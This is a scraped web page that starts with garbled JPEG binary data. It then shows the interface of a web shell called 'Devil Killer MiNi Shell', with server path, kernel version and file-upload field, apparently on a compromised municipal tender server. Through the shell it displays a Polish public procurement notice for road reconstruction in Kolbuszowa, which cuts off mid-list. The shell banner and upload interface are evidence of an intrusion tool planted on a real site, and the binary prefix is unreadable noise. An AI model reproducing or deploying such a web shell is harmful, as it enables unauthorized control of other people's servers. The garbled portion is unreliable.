JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221124/0045741401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej ul. J. Wiktora i budowa ul. Ks. L. Ruczki w Kolbuszowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KOLBUSZOWA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581666</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Obrońców Pokoju 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kolbuszowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@ekolbuszowa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ekolbuszowa.logintrade.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej ul. J. Wiktora i budowa ul. Ks. L. Ruczki w Kolbuszowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d65bbff5-6bf5-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00457414</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00018988/29/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.38 Przebudowa drogi gminnej ul. J. Wiktora i budowa ul. Ks. L. Ruczki w Kolbuszowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.ekolbuszowa.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.ekolbuszowa.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu<br/>platformyzakupowejPZP24https://ekolbuszowa.logintrade.net<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu,<br/>opisane zostały w Regulaminie i Instrukcji dostępnych pod adresem https://ekolbuszowa.logintrade.net<br/>3. Szczegółowe informacje zawarto w rozdziale VIII Instrukcji dla Wykonawców (Rozdział I SWZ).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO do zastosowania przez zamawiających w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>1.1.	Zamawiający Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego <br/>i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.1.1.	Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Miejskim <br/>w Kolbuszowej jest: Burmistrz Kolbuszowej; ul. Obrońców Pokoju 21, 36-100 Kolbuszowa. <br/>1.1.2.	Inspektorem ochrony danych osobowych w Gminie Kolbuszowa jest Pani: Lucyna Wyka<br/>ul. Piekarska 15<br/>36-100 Kolbuszowa <br/>Tel. 17 2271 333 wew. 424<br/>e-mail: rodo@ekolbuszowa.pl<br/>1.1.3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego:<br/>„Przebudowa drogi gminnej ul. J. Wiktora i budowa ul. Ks. L. Ruczki w Kolbuszowej” <br/>w ramach zadania pn.: <br/>„Przebudowa drogi gminnej nr 104039 R (ul. Wiktora) oraz budowa drogi gminnej (ul. ks. Ruczki) – II etap wraz z niezbędną infrastrukturą i urządzeniami budowlanymi” na działkach numer ewid. gruntów: 1772, 1778, 1779/2 położonych w obrębie ewidencyjnym 0001-Kolbuszowa, w jednostce ewidencyjnej 180602_4 (M).<br/>znak sprawy, ZP.271.1.78.2022, prowadzonym w trybie: podstawowym<br/>1.1.4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 3 Ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129)., dalej „ustawa Pzp”; <br/>1.1.5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres <br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>1.1.6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym <br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>1.1.7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>1.1.8.	Posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>1.1.9.	Nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>1.2.	Wykonawca zobowiązany jest wypełnić obowiązek informacyjny przewidziany w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu, a także w trakcie realizacji umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.78.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie inwestycyjne pn.: „Przebudowa drogi gminnej ul. J. Wiktora i budowa ul. ks. L. Ruczki w Kolbuszowej” dofinansowane jest z Rządowego Funduszu Polski Ład: Programu Inwestycji Strategicznych. Nr Edycja 3PGR/2021/807/PolskiLad.<br/>Realizacja inwestycji na podstawie Decyzji pozwolenia na budowę Nr 23/2022 z dnia 26.01.2022.<br/>Lokalizacja inwestycji: działki nr ewid. gruntów: 1772, 1778, 1779/2 położonych w miejscowości Kolbuszowa, gmina Kolbuszowa, powiat kolbuszowski, województwo podkarpackie.<br/><br/>Zakres robót budowlanych obejmuje:<br/>1.	BRANŻA DROGOWA - ODCINEK 1 w km od 0+245 do 0+461: „Przebudowa drogi gminnej nr 104039 R ul. Wiktora w Kolbuszowej”.<br/>1).	Przebudowa istniejącej nawierzchni z płyt drogowych. Wykonanie nowej nawierzchni jezdni z betonu asfaltowego o długości ok. 216 m i szerokości 6,5 m wraz z konstrukcją podbudowy:<br/>a)	warstwa ścieralna: beton asfaltowy AC 11 S – grub. 6 cm,<br/>b)	warstwa wiążąca: beton asfaltowy AC 16 W – grub. 7 cm,<br/>c)	podbudowa zasadnicza z kruszywa łamanego frakcji 0-31,5 mm – grub. 25 cm,<br/>d)	podbudowa pomocnicza z chudego betonu C12/15 – grub. 15 cm,<br/>e)	warstwa odsączająca z piasku średnioziarnistego o grub. 10 cm.<br/>2).	Budowa chodnika (strona prawa) o szerokości 2,0 m o nawierzchni z kostki brukowej betonowej.<br/>3).	Budowa odcinka kanalizacji deszczowej o średnicy DN 300 mm z rur PVC (SN8) o długości ok. 80 m wraz z montażem 2 szt. studni rewizyjnych betonowych o średnicy 1000 mm i 3 szt. wpustów ulicznych.<br/>4).	Przebudowa istniejącego rowu otwartego (strona lewa) z utwardzeniem dna i skarp betonowymi płytami ażurowymi.<br/>5).	Przebudowa i budowa zjazdów publicznych wraz z budową przepustów.<br/>6).	Wykonanie umocnienia pobocza w przekroju półulicznym z kruszywa łamanego frakcji 0-31,5 mm o szerokości 0,75 m i grub. 10 cm.<br/>7).	Budowa kanału technologicznego z rur HDPE Dn 110 o długości ok. 229 m wraz z montażem 7 szt. studni kablowych SKR-1.<br/>8).	Wykonanie oznakowania pionowego i poziomego jezdni.<br/><br/>2.	BRANŻA DROGOWA - ODCINEK 2 w km od 0+461 do 0+828: „Budowa drogi gminnej ul. Ks. Ruczki w Kolbuszowej – etap II wraz z niezbędną infrastrukturą i urządzeniami budowlanymi”.<br/>1).	Budowa nowego odcinka drogi o nawierzchni jezdni z betonu asfaltowego o długości ok. 367 m i szerokości 7,0 m wraz z konstrukcją podbudowy:<br/>a)	warstwa ścieralna: beton asfaltowy AC 11 S – grub. 6 cm,<br/>b)	warstwa wiążąca: beton asfaltowy AC 16 W – grub. 7 cm,<br/>c)	podbudowa zasadnicza z kruszywa łamanego frakcji 0-31,5 mm – grub. 25 cm,<br/>d)	podbudowa pomocnicza z chudego betonu C12/15 – grub. 15 cm,<br/>e)	warstwa odsączająca z piasku średnioziarnistego o grub. 10 cm.<br/>2).	Budowa chodnika (strona lewa) o szerokości 2,0 m o nawierzchni z kostki brukowej betonowej.<br/>3).	Budowa odcinka kanalizacji deszczowej o średnicy DN 300 mm z rur PVC (SN8) o długości ok. 74 m wraz z montażem 3 szt. studni rewizyjnych betonowych o średnicy 1000 mm i 10 szt. wpustów ulicznych.<br/>4).	Przebudowa istniejącego rowu otwartego nieumocnionego (strona lewa).<br/>5).	Wydłużenie istniejącego przepustu pod koroną drogi z rur betonowych o średnicy 1000 mm, służącego odwodnieniu terenu kolejowego.<br/>6).	Przebudowa i budowa zjazdów publicznych wraz z budową przepustów.<br/>7).	Wykonanie umocnienia pobocza (strona prawa) z kruszywa łamanego frakcji 0-31,5 mm o szerokości 0,75 m i grub. 10 cm.<br/>8).	Budowa kanału technologicznego z rur HDPE Dn 110 o długości ok. 370 m wraz z montażem 6 szt. studni kablowych SKR-1 (3 szt.) i SK-1 (3 szt.).<br/>9).	Wykonanie oznakowania pionowego i poziomego jezdni.<br/><br/>3.	OŚWIETLENIE ULICZNE. Przebudowa oświetlenia ulicznego związana z przebudową drogi gminnej nr 104039 R ul. Wiktora w Kolbuszowej oraz budowa oświetlenia ulicznego związana z budową drogi gminnej ul. ks. Ruczki w Kolbuszowej – etap II.<br/>1).	Demontaż istniejącej linii napowietrznej oświetlenia ulicznego wzdłuż ul. Wiktora o długości ok. 205 m wraz z demontażem 5 szt. słupów żelbetowych oraz opraw i wysięgników.<br/>2).	Projektowaną szafę oświetlenia drogowego ZP+SO zasilić z zabudowanego złącza ZK (typu ZK-3) - zgodnie z WT PGE Dystrybucja S.A. nr: L.dz. RE02/RM/PŚ/2022/9/81589KP22/w/11/154 z dnia 16.09.2022 r.<br/>3).	Montaż kompletnego złącza kablowo – pomiarowego ZP+SO.<br/>4).	Budowa linii podziemnej oświetlenia ulicznego o długości ok. 595 m kablem typu YAKXS 4x35 mm2.<br/>5).	Montaż 18 szt. słupów oświetleniowych oc. malowanych o wysokości 8,0 m, na prefabrykowanych fundamentach (5 szt. wzdłuż ul. Wiktora i 13 szt. wzdłuż ul. Ruczki).<br/>6).	Montaż opraw oświetlenia zewnętrznego (18 szt.) – oprawa LED ze sterownikiem na wysięgniku w kolorze słupów.<br/>7).	Zabezpieczenie kabla w miejscach skrzyżowań z elementami drogi lub istniejącym uzbrojeniem rurami ochronnymi.<br/>8).	Uwaga: w zakresie branży elektrycznej przewidziano do wykonania również usunięcie kolizji słupa nr 6 (ul. Wiktora km ok. 0+412) z projektowanym chodnikiem – zgodnie z Warunkami Technicznymi PGE Dystrybucja S.A. nr: L.dz. RE02/RM/PŚ/2022/9/81589KP22/w/11/154 z dnia 16.09.2022 r.<br/>	Demontaż przyłącza napowietrznego ze stacji Kolbuszowa 10 do słupa nr 6 i demontaż słupa nr 6,<br/>	Budowa nowego przyłącza kablowego (o dł. ok. 20 m) ze stacji transformatorowej nr S11-456 - Kolbuszowa 10 (kablem typu YAKXS o przekroju min. 120 mm2) i wprowadzić do złącza kablowego (typu ZK-3, II klasa ochronności).<br/>	Do zabudowanego złącza ZK wprowadzić istniejący przyłącz kablowy (dz. 81/4).<br/>UWAGA: Całość należy zgłosić do odbioru PGE Dystrybucja S.A. i przekazać protokół odbioru przyłącza i sieci oświetleniowej Inwestorowi.<br/><br/>Szczegółowe warunki dla opraw oświetleniowych Led oraz systemu sterowania.<br/>Oferowany system sterowania i zarządzania oświetleniem każdej z opraw musi być zintegrowany z już zainstalowanym na terenie Gminy Kolbuszowa systemem PLANet. System musi posiadać certyfikat TAQLv2 w celu zapewnienia interoperacyjności. System musi posiadać funkcjonalność co najmniej w takim zakresie jak już zainstalowany i eksploatowany przez Zamawiającego. W ramach dostawy Zamawiający oczekuje dostawy sterowników systemu zabudowanych do każdej oferowanej oprawy w układzie – oprawa wyposażona w gniazdo NEMA 5/7 pin, sterownik systemu oraz zworę prądową, wyposażone we wtyk odpowiedni do montażu w tym gnieździe. Sterowniki muszą być uniwersalne – zapewniające sterowanie zarówno sygnałem cyfrowanym DALI jak i analogowym 0-10V. Kluczowe parametry sterownika systemu: napięcie zasilania 230V,odporność na uderzenia IK minimum 06, stopień szczelności IP minimum 66, minimalny zakres temperatur pracy -40C do +50C, komunikacja radiowa w częstotliwości nielicencjonowanej 868MHz (zgodnie z normą EN 300 220) do już zabudowanych przez Zamawiającego stacji bazowych na terenie Gminy Kolbuszowa. <br/>Oprawy Led – minimalne parametry:<br/>a)	Obudowa wykonana z ciśnieniowego odlewu aluminium, górna część korpusu wykonana z jednego elementu pozbawiona łączeń, zawiasów oraz żeber.<br/>b)	Korpus malowany proszkowo z powłoką elektrostatyczną umożliwiającą samoistne usuwanie zanieczyszczeń z obudowy <br/>c)	Obudowa dwukomorowa, oddzielna komora umożliwiająca podłączenie zasilania oraz elementów systemu sterowania.<br/>d)	Oprawa wykonana w II klasie ochrony przeciwporażeniowej.<br/>e)	Oprawa wyposażona w system regulujący ciśnienie w oprawie, zapobiegający przed kondensacją wilgoci wewnątrz oprawy.<br/>f)	Komora oprawy i osprzętu o szczelności IP 66.<br/>g)	Odporność na uderzenia - IK 07.<br/>h)	Temperatura barwowa użytych diod z zakresu 3800K – 4200K.<br/>i)	Układ zasilający oprawy umożliwiający sterowanie sygnałem cyfrowym DALI lub analogowym 0 -10 V.<br/>j)	Redukcja mocy (strumienia) musi odbywać się w sposób płynny przez zmniejszenie strumienia świetlnego wszystkich źródeł LED jednocześnie a nie przez wyłączanie poszczególnych paneli LED w jednej oprawie.<br/>k)	Skuteczność świetlna oprawy (uwzględniająca wszystkie straty) min. 170 lm/W.<br/>l)	Współczynnik mocy (cos φ)≥0,98 dla mocy znamionowej, utrzymanie współczynnika mocy (cos φ) powyżej 0,95 przy sterowaniu oprawy w zakresie 0-100% mocy znamionowej.<br/>m)	Odporność oprawy na przepięcia: 10 kV.<br/>n)	Zaczep oprawy powinien stanowić integralną część oprawy i posiadać możliwość montażu na wysięgniku oraz bezpośrednio na słupach oświetleniowych. Zaczep powinien mieć możliwość regulacji kąta pochylenia 0-15⁰ i -15-0⁰.<br/>o)	Strumień świetlny lampy – min. 5337 lm.<br/>p)	Oprawa wyposażona w gniazdo NEMA 5/7pin.<br/>q)	Oprawa malowana w kolorze słupów.<br/>r)	Gwarancja min. 7 lat (84 miesiące) od daty odbioru robót.<br/><br/>4.	PRZEBUDOWA SIECI PODZIEMNYCH KOLIDUJĄCYCH Z PROJEKTOWANĄ INFRASTRUKTURĄ. Przebudowa sieci wodociągowej związana z przebudową drogi gminnej nr 104039 R ul. Wiktora w Kolbuszowej.<br/>1).	Przebudowa istniejącej sieci wodociągowej stalowej DN250 mm w sposób niekolidujący z projektowanymi elementami drogi. Montaż nowego odcinka sieci wodociągowej z rur PEHD 100 SDR 11 Dn 315 o długości L=113 m oraz odcinka z rur PE HD 100 SDR 17 Dn 160 mm o długości L=8,5 m. Przekroczenie pod drogą wykonać w rurze osłonowej PE HD SDR 17 Dn 400 mm o długości L=7,5 m. <br/><br/>Szczegółowy zakres robót precyzują: projekt budowalny i projekty wykonawcze. Przedmiary robót mają charakter pomocniczy. <br/><br/>Realizacja przedmiotu zamówienia musi być zgodna z ofertą i SWZ, w szczególności z:<br/>a)	Opisem Przedmiotu zamówienia / dokumentacją techniczną (Rozdział III),<br/>b)	Istotnymi postanowieniami umowy (Rozdział IV),<br/>c)	Przedmiarami robót (Rozdział II ) – przedmiar ma charakter pomocniczy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">330 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający<br/>przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7) udzielenia,<br/>w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług lub robót budowlanych,<br/>zamówienia polegającego na powtórzeniu podobnych usług lub robót budowlanych do 50%, jeżeli takie zamówienie było<br/>przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z jego przedmiotem oraz całkowita wartość<br/>tego zamówienia została uwzględniona przy obliczaniu jego wartości.<br/>Powtórzenie podobnych robót budowlanych do wysokości 50% zamówienia podstawowego.<br/>Zakres robót podobnych:<br/>- 